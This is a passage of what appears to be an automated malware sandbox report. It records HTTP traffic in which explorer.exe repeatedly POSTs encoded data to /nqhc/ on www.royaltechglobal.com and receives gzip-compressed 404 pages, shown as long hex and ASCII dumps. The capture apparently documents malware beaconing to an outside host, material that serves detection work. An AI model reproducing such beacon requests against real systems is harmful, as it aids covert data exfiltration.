                                                                                                                                                                          Data Ascii: 7nWHV=cCD7hmI-Mx(gzG3f5hq08lamwTvDaR8uhvnEoWkcsh~4gx5d98FTY5hyeu3ux-ExXsniJG1hb5o5tXDm5TgI86aeP2omoshZIp9GrI8BHDtGlhGqp4QeO1yYzhn47GOIDPYJk741hioEu9T7ZOzS1zm9Gyf1NPhqkozpGN4vBj3rL_3Kdw).
                                                                                                                                                                          Dec 5, 2022 15:18:41.956681013 CET12335INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:18:41 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                          Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                                                          Content-Length: 13070
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a 62 64 67 a7 ea ee 4d 5b e4 4c 4f f7 ea d5 ab 57 ff d9 d7 6f cf df ff e3 c7 57 24 35 19 1f ee ee f6 ed 2f 89 99 1a 38 dc 28 87 70 2a 92 81 03 c2 fd e9 c2 d9 dd c9 15 8c d8 f5 c0 91 49 0f 0b 4c ae 7b be 2f 93 dc cb c0 17 fa b9 43 10 60 a7 9f 02 8d 87 bb 3b 84 ec f4 33 30 94 44 29 55 1a cc c0 f9 e9 fd 37 ee 89 b3 fc 24 68 06 03 67 cc 60 92 4b 65 1c 12 49 61 40 60 ea 84 c5 26 1d c4 30 66 11 b8 e5 a5 ae db dd d9 e9 3f 73 5d f2 82 73 c2 04 79 2b 80 5c bc 7a 4b 3a 5e cb 3b f6 02 e2 12 ca a4 06 e9 45 32 23 ae 3b b4 e9 4b 9d 94 0c a5 d1 4b 7d 84 64 22 86 6b 87 f8 77 53 13 10 a0 a8 91 6a 29 fb 4e d3 fd 17 df bf c5 df 83 79 f7 19 8c 8e 14 cb 0d 31 d3 1c 81 68 9e 73 16 51 c3 a4 f0 79 7c f8 51 4b 81 90 9c 6a 8d 6f 25 59 57 47 29 64 d4 4e b8 b3 73 e3 fc 47 d9 ef da 38 3d a7 d2 f8 83 ff c1 af 52 3c a9 12 a7 e1 fc 47 a2 68 9e 3a bd 5f 30 d9 36 c1 cc 97 0a 55 8f 54 91 85 af 99 36 36 87 c5 2b 00 4a 4e 29 37 10 a5 09 97 21 e5 56 a0 0f be f8 2d 8d 3e f8 cf c3 79 31 af 8a 99 81 cc e2 bc e2 90 e1 e4 2b 9d 6c fc 7b 7c df b6 c7 73 be 28 c8 a5 66 56 08 a7 17 54 4d 9c de 02 f8 67 08 7f a4 09 6c 8b 8b 79 76 53 98 f8 9d cc 6c 55 a1 f8 16 55 b7 58 86 e2 96 84 b6 d5 67 3e c1 6d e3 e9 3a dc c5 5a 56 a3 f5 c9 6a 54 e8 0b 4d 7e 90 86 7c 23 0b 11 6f 2b 4c 0d 80 f2 e4 0a c6 4c 16 7a 3b 89 96 c4 f9 75 59 9e b7 2a a1 82 fd 5e fa 7e 6b ab c8 d5 a2 7a 96 77 36 97 bc c7 64 f2 6d 99 bd f5 b2 1b 0e 97 89 5c 96 f5 fb 0c 45 7d 1b 7e 84 c8 6c 8b 32 c9 dd 48 0a 03 c2 7c f0 8b 9c 4b 1a eb 0f 7e ab d9 6a 7d f0 83 e0 83 1f 29 99 e7 10 bb af b1 d3 1b 7a a5 dc c0 cb 45 f2 a4 91 2d 04 16 4e 58 6c 52 34 45 a7 d9 70 52 60 49 6a 9c 5e a7 8d 9b 61 96 7c 39 cd d3 a0 6f 97 17 f4 24 83 3d 9f 40 98 57 55 7f c4 55 48 5d bc a6 22 29 4a fe 0e 08 f7 a7 0b 1b d4 3f 52 65 de 8e b6 1f 09 db 6b 66 c0 da 34 54 40 e3 48 15 59 b8 75 79 3d c3 a2 d2 7a f7 9e 2a 17 b6 c1 b6 eb 9b 11 da de 91 1b 4c bd 56 a4 bc b0 34 53 50 4f 5b 3c 8e f7 eb ed ee ce 4e df d7 91 62 b9 19 da f3 33 d7 25 2f 38 27 4c 90 b7 02 c8 c5 ab b7 c4 75 87 bb bb bb d5 d3 fb 94 69 62 c7 22 f8 2b 73 c3 32 f6 3b c4 64 c2 4c 4a 4c 0a e4 1f 92 6a 53 56 e5 bc 48 10 64 1c 9c 7a 41 40 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03
                                                                                                                                                                          Data Ascii: rksg1\- "c+;OR&0`bto$bdgM[LOWoW$5/8(p*IL{/C`;30D)U7$hg`KeIa@`&0f?s]sy+\zK:^;E2#;KK}d"kwSj)Ny1hsQy|QKjo%YWG)dNsG8=R<Gh:_06UT66+JN)7!V->y1+l{|s(fVTMglyvSlUUXg>m:ZVjTM~|#o+LLz;uY*^~kzw6dm\E}~l2H|K~j})zE-NXlR4EpR`Ij^a|9o$=@WUUH]")J?Rekf4T@HYuy=z*LV4SPO[<Nb3%/8'Luib"+s2;dLJLjSVHdzA@\R1lTq@kvCkC"!#YQiL,P+2#H
                                                                                                                                                                          Dec 5, 2022 15:18:41.956757069 CET12337INData Raw: c2 0c 50 b9 4b 54 8e f8 eb d3 4b a4 a5 ec c7 bb 3f 08 65 25 ba 2c f7 b9 80 7b a8 ba 52 9f 58 9b 0d 1c 9a e7 9c 45 e5 7e 7c 1e 1f 7e d4 b8 27 12 71 aa f5 c0 29 a5 73 75 94 42 46 dd 44 d1 3c 75 86 b8 f8 b2 c1 b5 99 6f df f7 ab 14 0f 97 6d dd 5a 65
                                                                                                                                                                          Data Ascii: PKTK?e%,{RXE~|~'q)suBFD<uomZe~y:<MC5^dUQ"@f~h8LNx%(0h!95FTvb"t~+@M]&.CoS~ska5IF.vy%W+6lcmre#DV
                                                                                                                                                                          Dec 5, 2022 15:18:41.956813097 CET12338INData Raw: ef 07 bd 7d cc 30 86 46 69 99 b4 ef 48 51 3f 1f d8 de ab 2f 25 3b 6d a8 81 28 a5 22 01 a7 b1 44 de 89 64 96 73 30 e0 0c 06 03 5a 4d 72 61 73 ed 62 ee ce 75 70 d0 d8 07 2b bf 2c 54 04 ff fb bf 37 b7 07 5e 24 45 84 e9 d6 ba 5f 45 48 6b e9 7e d0 03
                                                                                                                                                                          Data Ascii: }0FiHQ?/%;m("Dds0ZMrasbup+,T7^$E_EHk~o/Lo{n'LreTd8A{uKg}_Gffi#.vu8L!7;19a30g;T1SH&]J&iz9"]
                                                                                                                                                                          Dec 5, 2022 15:18:41.956868887 CET12339INData Raw: 0b dc 1e 83 94 c7 25 a4 2d cb 2a de 38 08 fa 6e da ab 3d 50 96 3d b2 8a 8c 19 37 2c 90 a5 58 16 b3 65 d5 9c a1 3d 0a a3 e0 b7 82 29 88 5d eb b4 b5 24 e6 76 3a cb 69 1c 33 91 2c 3c 5e 8a dc f4 da 9b d7 25 c5 85 e5 aa 35 43 a2 29 b0 24 35 25 c4 13
                                                                                                                                                                          Data Ascii: %-*8n=P=7,Xe=)]$v:i3,<^%5C)$5%M;bJhEESqFQGReP[4l"j,(#hSrcT,o=%'gt/a@5:[W-A9u(Uf%g,I.UOb5.vQEcV^Fht(YFn7n8=!
                                                                                                                                                                          Dec 5, 2022 15:18:41.956923962 CET12341INData Raw: b5 4f 36 a4 9c 60 4a d7 6b 1e d9 94 db de 24 05 05 fb 1e d3 28 c4 54 16 c6 1d 71 b8 3e b8 49 68 6e 07 ea da 9c 50 c6 53 b2 92 21 27 64 48 3c ca 59 22 38 8c cc 0d 46 28 5a d8 9e cf 32 d4 93 09 97 09 ce 70 ed da 50 85 2f cd 3b 61 10 31 8e f2 28 b8
                                                                                                                                                                          Data Ascii: O6`Jk$(Tq>IhnPS!'dH<Y"8F(Z2pP/;a1(bI:G//-G#M]i-$XKe+IH!$Z+.Xmf!];aI{dLNrrpr28ppgVlbi_&f:{9(>+)@{
                                                                                                                                                                          Dec 5, 2022 15:18:41.956979036 CET12342INData Raw: ca 1f 3e a2 87 17 9c 86 87 6f 45 75 e7 85 a2 75 31 5e 85 91 c2 fe aa 28 65 a8 91 d1 87 5f d3 02 9d 0d 6a 16 1d 4b cc 0e ca 56 81 6d d5 3a 6f 95 97 56 75 69 97 97 76 75 59 62 d4 3a ef 96 97 6e 75 39 2a 2f 47 d5 e5 b8 bc 1c 57 97 93 f2 72 52 5d 4e
                                                                                                                                                                          Data Ascii: >oEuu1^(e_jKVm:oVuivuYb:nu9*/GWrR]Ni=b\sKT[AP~NjD>4:L*fe',T?nK*PKYH\2KfqR^@DL,tr|~NC&hs'YP2mT
                                                                                                                                                                          Dec 5, 2022 15:18:41.957031965 CET12343INData Raw: 7b 24 83 98 d1 c1 1e e5 7c 8f f8 c3 dd 3e 67 e2 8a e0 4e 06 7b 1a 9d 0e 3a 05 30 7b 84 c5 83 bd f1 c4 8d a9 ba 72 43 2e a3 2b b7 7c 75 4b 88 54 c1 68 b0 97 1a 93 f7 7c 5f c9 29 e5 06 a2 34 e1 32 a4 dc 8b 64 e6 4f 72 37 92 c2 80 30 be 49 21 03 ed
                                                                                                                                                                          Data Ascii: {$|>gN{:0{rC.+|uKTh|_)42dOr70I!X>LV{xOSc@]O0|B)63?aT31.Q(AJL5;HP^Gf(;)A"{sY&f:tR-i+r+\8c
                                                                                                                                                                          Dec 5, 2022 15:18:41.957084894 CET12345INData Raw: 0f 95 49 ac 91 87 ff 3f fb fd df 56 0f b6 f6 76 b0 b5 99 83 7f bb f7 9f e2 de bc 50 39 07 77 0a 1c ab fe 55 1d ec 75 3b a7 cd e0 f4 a8 79 7c d2 69 db a6 de e9 c9 49 ab dd 6d 9d 76 82 e0 f8 a8 fb f9 fd ed 1d 23 6e e7 b8 d9 2d fb b4 b1 63 6b 85 c3
                                                                                                                                                                          Data Ascii: I?VvP9wUu;y|iImv#n-ck8A_\24&ZB*oS9Dj0Q_:=L&Ifip&/MZZ><dTh;Qq"%E yh31,d7#4?cP#
                                                                                                                                                                          Dec 5, 2022 15:18:41.957140923 CET12346INData Raw: aa 11 bb c6 e9 0b 5e 91 c5 b0 1b 2c ac 5c 27 d4 fb b9 2c 19 f7 39 5b e4 22 df cc 0d ba 0b a2 b3 20 59 3c 9b 69 0e 6e 54 68 23 97 a3 32 fc 08 91 b9 1f 47 b0 61 9f 92 54 c1 08 ed 64 4c ae 7b be af e4 94 72 03 51 9a 70 19 52 ee 45 32 73 86 df c9 0c
                                                                                                                                                                          Data Ascii: ^,\',9[" Y<inTh#2GaTdL{rQpRE2s>p6]CqZ3iEx4q;H~YV[04yW|V'[2f4Gx$ohd+6+8dvWp,1Ic#rK7#F\j GCj
                                                                                                                                                                          Dec 5, 2022 15:18:41.957199097 CET12347INData Raw: 26 ed fb d5 6b 99 7d 27 75 6f 93 75 5b cd 56 cb 0f 02 7f 6f 48 7e 90 63 c8 42 50 c4 c6 c8 12 e2 1f 86 6b 5a b8 b7 91 91 9f 03 ad 79 6a d1 2e 20 37 9f 87 5d f3 c4 e2 bd 28 92 42 9b 4f 07 3b b6 60 ff 59 f0 e9 a7 43 1d 55 50 02 3e 1d aa 6b a1 de d0
                                                                                                                                                                          Data Ascii: &k}'uou[VoH~cBPkZyj. 7](BO;`YCUP>k@S+?]BB}]/})b9?1p?_BYr3J2 08>q,6CvwfxDyJEyATs@g#
                                                                                                                                                                          Dec 5, 2022 15:18:42.071060896 CET12348INData Raw: e4 a1 db 76 96 11 77 ca 82 f9 08 f9 54 d9 11 49 24 85 a1 0c 07 75 d6 b0 ca 67 f9 59 e8 36 9d 21 ea 5e 8a 3c d3 78 32 99 78 e3 09 1a 21 03 5d 0a 5c 1d fd 91 02 70 63 aa ae dc 89 54 71 ae 40 6b b7 7c f2 89 a1 2a 01 33 d8 bb 0c 39 15 57 7b c3 af 31
                                                                                                                                                                          Data Ascii: vwTI$ugY6!^<x2x!]\pcTq@k|*39W{1Y?,f\^q}n<k#%9/rb#\JrWl,*\?.JHS^-rWXzD,7LsYG:Uti/$I]"q?j#g


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          65192.168.11.2049910192.185.32.15780C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:18:43.798408985 CET12350OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.royaltechglobal.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.royaltechglobal.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.royaltechglobal.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 63 43 44 37 68 6d 49 2d 4d 78 28 67 69 57 48 66 34 47 32 30 70 56 61 68 28 7a 76 44 44 68 39 6e 68 76 72 45 6f 58 67 4d 35 48 75 34 68 51 4a 64 38 2d 39 54 56 5a 68 79 4b 2d 33 72 7e 65 45 2d 58 73 71 58 4a 44 4e 68 62 39 41 35 73 68 58 6d 28 6a 67 4c 6b 4b 61 64 49 32 6f 6a 35 38 68 48 49 70 68 53 72 4a 34 42 41 77 70 47 6b 6a 75 71 7e 5a 51 5a 45 31 79 6b 36 42 6e 37 78 6d 4f 38 44 4f 6b 33 6b 36 51 6c 67 52 30 45 67 38 7a 37 59 4f 7a 54 75 7a 6d 36 45 79 66 72 44 39 4d 63 70 34 48 46 61 74 45 4d 4f 53 47 38 4a 4f 47 57 42 71 53 51 66 59 65 4d 30 34 32 48 71 50 59 32 44 48 37 4d 44 61 34 4d 63 2d 53 70 74 70 7e 63 74 4d 51 72 6c 4f 75 49 72 64 66 55 4e 65 36 30 32 61 54 4d 79 75 7a 54 28 39 4a 33 54 45 70 31 78 71 62 79 44 74 28 52 70 6f 5a 34 7e 48 63 38 52 64 52 6d 34 57 4d 39 4a 69 61 7a 30 4d 43 50 6f 33 6a 39 42 77 7e 61 77 56 76 53 6d 55 6f 36 52 7a 32 2d 67 54 53 46 37 46 72 71 57 51 55 46 72 6d 43 44 54 30 34 41 36 64 28 44 31 6a 54 47 36 4a 65 4c 6a 4d 41 59 4a 59 31 6c 37 63 67 7a 62 74 4c 47 67 72 51 30 63 76 43 44 68 6a 32 68 57 62 4c 42 72 2d 6d 45 4a 44 70 4b 4c 65 73 50 66 48 38 4c 74 55 4a 66 71 70 33 61 4b 6e 42 4a 49 68 28 4f 66 6a 48 55 7e 50 75 50 66 69 44 4f 34 52 73 49 43 45 34 64 63 49 4f 51 51 57 4d 48 54 62 31 78 5a 46 4e 63 72 33 37 72 4b 53 7a 35 41 4e 53 58 37 7a 46 66 6e 36 6b 59 33 64 58 77 51 53 6e 7a 7a 51 63 59 62 57 4d 77 62 58 28 77 6c 33 57 35 6c 63 76 53 35 35 51 79 43 31 5a 77 6a 54 64 43 48 5f 4d 55 48 56 6d 70 62 6e 43 53 70 6e 39 48 55 63 36 33 43 61 4e 53 4e 46 4b 54 53 34 77 42 66 73 6f 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=cCD7hmI-Mx(giWHf4G20pVah(zvDDh9nhvrEoXgM5Hu4hQJd8-9TVZhyK-3r~eE-XsqXJDNhb9A5shXm(jgLkKadI2oj58hHIphSrJ4BAwpGkjuq~ZQZE1yk6Bn7xmO8DOk3k6QlgR0Eg8z7YOzTuzm6EyfrD9Mcp4HFatEMOSG8JOGWBqSQfYeM042HqPY2DH7MDa4Mc-Sptp~ctMQrlOuIrdfUNe602aTMyuzT(9J3TEp1xqbyDt(RpoZ4~Hc8RdRm4WM9Jiaz0MCPo3j9Bw~awVvSmUo6Rz2-gTSF7FrqWQUFrmCDT04A6d(D1jTG6JeLjMAYJY1l7cgzbtLGgrQ0cvCDhj2hWbLBr-mEJDpKLesPfH8LtUJfqp3aKnBJIh(OfjHU~PuPfiDO4RsICE4dcIOQQWMHTb1xZFNcr37rKSz5ANSX7zFfn6kY3dXwQSnzzQcYbWMwbX(wl3W5lcvS55QyC1ZwjTdCH_MUHVmpbnCSpn9HUc63CaNSNFKTS4wBfso.
                                                                                                                                                                          Dec 5, 2022 15:18:44.077199936 CET12351INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:18:43 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                          Link: <https://royaltechglobal.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                                                          Content-Length: 13070
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6b 73 db c6 b2 ed 67 a9 ea fe 87 31 5c 89 a4 2d 02 20 f8 d0 83 22 99 63 2b ce e3 1c 3b ce b1 9c 9d bb 4f 9c 52 0d 80 26 30 d6 60 06 99 19 90 62 74 f4 df 6f 0f 00 be 24 8a 62 64 67 a7 ea ee 4d 5b e4 4c 4f f7 ea d5 ab 57 ff d9 d7 6f cf df ff e3 c7 57 24 35 19 1f ee ee f6 ed 2f 89 99 1a 38 dc 28 87 70 2a 92 81 03 c2 fd e9 c2 d9 dd c9 15 8c d8 f5 c0 91 49 0f 0b 4c ae 7b be 2f 93 dc cb c0 17 fa b9 43 10 60 a7 9f 02 8d 87 bb 3b 84 ec f4 33 30 94 44 29 55 1a cc c0 f9 e9 fd 37 ee 89 b3 fc 24 68 06 03 67 cc 60 92 4b 65 1c 12 49 61 40 60 ea 84 c5 26 1d c4 30 66 11 b8 e5 a5 ae db dd d9 e9 3f 73 5d f2 82 73 c2 04 79 2b 80 5c bc 7a 4b 3a 5e cb 3b f6 02 e2 12 ca a4 06 e9 45 32 23 ae 3b b4 e9 4b 9d 94 0c a5 d1 4b 7d 84 64 22 86 6b 87 f8 77 53 13 10 a0 a8 91 6a 29 fb 4e d3 fd 17 df bf c5 df 83 79 f7 19 8c 8e 14 cb 0d 31 d3 1c 81 68 9e 73 16 51 c3 a4 f0 79 7c f8 51 4b 81 90 9c 6a 8d 6f 25 59 57 47 29 64 d4 4e b8 b3 73 e3 fc 47 d9 ef da 38 3d a7 d2 f8 83 ff c1 af 52 3c a9 12 a7 e1 fc 47 a2 68 9e 3a bd 5f 30 d9 36 c1 cc 97 0a 55 8f 54 91 85 af 99 36 36 87 c5 2b 00 4a 4e 29 37 10 a5 09 97 21 e5 56 a0 0f be f8 2d 8d 3e f8 cf c3 79 31 af 8a 99 81 cc e2 bc e2 90 e1 e4 2b 9d 6c fc 7b 7c df b6 c7 73 be 28 c8 a5 66 56 08 a7 17 54 4d 9c de 02 f8 67 08 7f a4 09 6c 8b 8b 79 76 53 98 f8 9d cc 6c 55 a1 f8 16 55 b7 58 86 e2 96 84 b6 d5 67 3e c1 6d e3 e9 3a dc c5 5a 56 a3 f5 c9 6a 54 e8 0b 4d 7e 90 86 7c 23 0b 11 6f 2b 4c 0d 80 f2 e4 0a c6 4c 16 7a 3b 89 96 c4 f9 75 59 9e b7 2a a1 82 fd 5e fa 7e 6b ab c8 d5 a2 7a 96 77 36 97 bc c7 64 f2 6d 99 bd f5 b2 1b 0e 97 89 5c 96 f5 fb 0c 45 7d 1b 7e 84 c8 6c 8b 32 c9 dd 48 0a 03 c2 7c f0 8b 9c 4b 1a eb 0f 7e ab d9 6a 7d f0 83 e0 83 1f 29 99 e7 10 bb af b1 d3 1b 7a a5 dc c0 cb 45 f2 a4 91 2d 04 16 4e 58 6c 52 34 45 a7 d9 70 52 60 49 6a 9c 5e a7 8d 9b 61 96 7c 39 cd d3 a0 6f 97 17 f4 24 83 3d 9f 40 98 57 55 7f c4 55 48 5d bc a6 22 29 4a fe 0e 08 f7 a7 0b 1b d4 3f 52 65 de 8e b6 1f 09 db 6b 66 c0 da 34 54 40 e3 48 15 59 b8 75 79 3d c3 a2 d2 7a f7 9e 2a 17 b6 c1 b6 eb 9b 11 da de 91 1b 4c bd 56 a4 bc b0 34 53 50 4f 5b 3c 8e f7 eb ed ee ce 4e df d7 91 62 b9 19 da f3 33 d7 25 2f 38 27 4c 90 b7 02 c8 c5 ab b7 c4 75 87 bb bb bb d5 d3 fb 94 69 62 c7 22 f8 2b 73 c3 32 f6 3b c4 64 c2 4c 4a 4c 0a e4 1f 92 6a 53 56 e5 bc 48 10 64 1c 9c 7a 41 40 5c 52 31 f3 fd a9 cd b0 6c fc 89 54 71 ae 40 6b bf ca d5 be 06 e9 97 ed 76 fa 86 19 0e 43 6b 43 22 a4 21 23 59 88 18 51 ee 69 d3 f7 ab 4c 2c c9 c0 50 92 2b 99 83 32 d3 81 23 93 1e 97 11 e5 e0 90 48 0a 03
                                                                                                                                                                          Data Ascii: rksg1\- "c+;OR&0`bto$bdgM[LOWoW$5/8(p*IL{/C`;30D)U7$hg`KeIa@`&0f?s]sy+\zK:^;E2#;KK}d"kwSj)Ny1hsQy|QKjo%YWG)dNsG8=R<Gh:_06UT66+JN)7!V->y1+l{|s(fVTMglyvSlUUXg>m:ZVjTM~|#o+LLz;uY*^~kzw6dm\E}~l2H|K~j})zE-NXlR4EpR`Ij^a|9o$=@WUUH]")J?Rekf4T@HYuy=z*LV4SPO[<Nb3%/8'Luib"+s2;dLJLjSVHdzA@\R1lTq@kvCkC"!#YQiL,P+2#H
                                                                                                                                                                          Dec 5, 2022 15:18:44.077249050 CET12352INData Raw: c2 0c 50 b9 4b 54 8e f8 eb d3 4b a4 a5 ec c7 bb 3f 08 65 25 ba 2c f7 b9 80 7b a8 ba 52 9f 58 9b 0d 1c 9a e7 9c 45 e5 7e 7c 1e 1f 7e d4 b8 27 12 71 aa f5 c0 29 a5 73 75 94 42 46 dd 44 d1 3c 75 86 b8 f8 b2 c1 b5 99 6f df f7 ab 14 0f 97 6d dd 5a 65
                                                                                                                                                                          Data Ascii: PKTK?e%,{RXE~|~'q)suBFD<uomZe~y:<MC5^dUQ"@f~h8LNx%(0h!95FTvb"t~+@M]&.CoS~ska5IF.vy%W+6lcmre#DV
                                                                                                                                                                          Dec 5, 2022 15:18:44.077284098 CET12353INData Raw: ef 07 bd 7d cc 30 86 46 69 99 b4 ef 48 51 3f 1f d8 de ab 2f 25 3b 6d a8 81 28 a5 22 01 a7 b1 44 de 89 64 96 73 30 e0 0c 06 03 5a 4d 72 61 73 ed 62 ee ce 75 70 d0 d8 07 2b bf 2c 54 04 ff fb bf 37 b7 07 5e 24 45 84 e9 d6 ba 5f 45 48 6b e9 7e d0 03
                                                                                                                                                                          Data Ascii: }0FiHQ?/%;m("Dds0ZMrasbup+,T7^$E_EHk~o/Lo{n'LreTd8A{uKg}_Gffi#.vu8L!7;19a30g;T1SH&]J&iz9"]
                                                                                                                                                                          Dec 5, 2022 15:18:44.077317953 CET12355INData Raw: 0b dc 1e 83 94 c7 25 a4 2d cb 2a de 38 08 fa 6e da ab 3d 50 96 3d b2 8a 8c 19 37 2c 90 a5 58 16 b3 65 d5 9c a1 3d 0a a3 e0 b7 82 29 88 5d eb b4 b5 24 e6 76 3a cb 69 1c 33 91 2c 3c 5e 8a dc f4 da 9b d7 25 c5 85 e5 aa 35 43 a2 29 b0 24 35 25 c4 13
                                                                                                                                                                          Data Ascii: %-*8n=P=7,Xe=)]$v:i3,<^%5C)$5%M;bJhEESqFQGReP[4l"j,(#hSrcT,o=%'gt/a@5:[W-A9u(Uf%g,I.UOb5.vQEcV^Fht(YFn7n8=!
                                                                                                                                                                          Dec 5, 2022 15:18:44.077349901 CET12356INData Raw: b5 4f 36 a4 9c 60 4a d7 6b 1e d9 94 db de 24 05 05 fb 1e d3 28 c4 54 16 c6 1d 71 b8 3e b8 49 68 6e 07 ea da 9c 50 c6 53 b2 92 21 27 64 48 3c ca 59 22 38 8c cc 0d 46 28 5a d8 9e cf 32 d4 93 09 97 09 ce 70 ed da 50 85 2f cd 3b 61 10 31 8e f2 28 b8
                                                                                                                                                                          Data Ascii: O6`Jk$(Tq>IhnPS!'dH<Y"8F(Z2pP/;a1(bI:G//-G#M]i-$XKe+IH!$Z+.Xmf!];aI{dLNrrpr28ppgVlbi_&f:{9(>+)@{
                                                                                                                                                                          Dec 5, 2022 15:18:44.077383041 CET12357INData Raw: ca 1f 3e a2 87 17 9c 86 87 6f 45 75 e7 85 a2 75 31 5e 85 91 c2 fe aa 28 65 a8 91 d1 87 5f d3 02 9d 0d 6a 16 1d 4b cc 0e ca 56 81 6d d5 3a 6f 95 97 56 75 69 97 97 76 75 59 62 d4 3a ef 96 97 6e 75 39 2a 2f 47 d5 e5 b8 bc 1c 57 97 93 f2 72 52 5d 4e
                                                                                                                                                                          Data Ascii: >oEuu1^(e_jKVm:oVuivuYb:nu9*/GWrR]Ni=b\sKT[AP~NjD>4:L*fe',T?nK*PKYH\2KfqR^@DL,tr|~NC&hs'YP2mT
                                                                                                                                                                          Dec 5, 2022 15:18:44.077419043 CET12359INData Raw: 7b 24 83 98 d1 c1 1e e5 7c 8f f8 c3 dd 3e 67 e2 8a e0 4e 06 7b 1a 9d 0e 3a 05 30 7b 84 c5 83 bd f1 c4 8d a9 ba 72 43 2e a3 2b b7 7c 75 4b 88 54 c1 68 b0 97 1a 93 f7 7c 5f c9 29 e5 06 a2 34 e1 32 a4 dc 8b 64 e6 4f 72 37 92 c2 80 30 be 49 21 03 ed
                                                                                                                                                                          Data Ascii: {$|>gN{:0{rC.+|uKTh|_)42dOr70I!X>LV{xOSc@]O0|B)63?aT31.Q(AJL5;HP^Gf(;)A"{sY&f:tR-i+r+\8c
                                                                                                                                                                          Dec 5, 2022 15:18:44.077452898 CET12360INData Raw: 0f 95 49 ac 91 87 ff 3f fb fd df 56 0f b6 f6 76 b0 b5 99 83 7f bb f7 9f e2 de bc 50 39 07 77 0a 1c ab fe 55 1d ec 75 3b a7 cd e0 f4 a8 79 7c d2 69 db a6 de e9 c9 49 ab dd 6d 9d 76 82 e0 f8 a8 fb f9 fd ed 1d 23 6e e7 b8 d9 2d fb b4 b1 63 6b 85 c3
                                                                                                                                                                          Data Ascii: I?VvP9wUu;y|iImv#n-ck8A_\24&ZB*oS9Dj0Q_:=L&Ifip&/MZZ><dTh;Qq"%E yh31,d7#4?cP#
                                                                                                                                                                          Dec 5, 2022 15:18:44.077486038 CET12361INData Raw: aa 11 bb c6 e9 0b 5e 91 c5 b0 1b 2c ac 5c 27 d4 fb b9 2c 19 f7 39 5b e4 22 df cc 0d ba 0b a2 b3 20 59 3c 9b 69 0e 6e 54 68 23 97 a3 32 fc 08 91 b9 1f 47 b0 61 9f 92 54 c1 08 ed 64 4c ae 7b be af e4 94 72 03 51 9a 70 19 52 ee 45 32 73 86 df c9 0c
                                                                                                                                                                          Data Ascii: ^,\',9[" Y<inTh#2GaTdL{rQpRE2s>p6]CqZ3iEx4q;H~YV[04yW|V'[2f4Gx$ohd+6+8dvWp,1Ic#rK7#F\j GCj
                                                                                                                                                                          Dec 5, 2022 15:18:44.077519894 CET12363INData Raw: 26 ed fb d5 6b 99 7d 27 75 6f 93 75 5b cd 56 cb 0f 02 7f 6f 48 7e 90 63 c8 42 50 c4 c6 c8 12 e2 1f 86 6b 5a b8 b7 91 91 9f 03 ad 79 6a d1 2e 20 37 9f 87 5d f3 c4 e2 bd 28 92 42 9b 4f 07 3b b6 60 ff 59 f0 e9 a7 43 1d 55 50 02 3e 1d aa 6b a1 de d0
                                                                                                                                                                          Data Ascii: &k}'uou[VoH~cBPkZyj. 7](BO;`YCUP>k@S+?]BB}]/})b9?1p?_BYr3J2 08>q,6CvwfxDyJEyATs@g#
                                                                                                                                                                          Dec 5, 2022 15:18:44.191595078 CET12364INData Raw: e4 a1 db 76 96 11 77 ca 82 f9 08 f9 54 d9 11 49 24 85 a1 0c 07 75 d6 b0 ca 67 f9 59 e8 36 9d 21 ea 5e 8a 3c d3 78 32 99 78 e3 09 1a 21 03 5d 0a 5c 1d fd 91 02 70 63 aa ae dc 89 54 71 ae 40 6b b7 7c f2 89 a1 2a 01 33 d8 bb 0c 39 15 57 7b c3 af 31
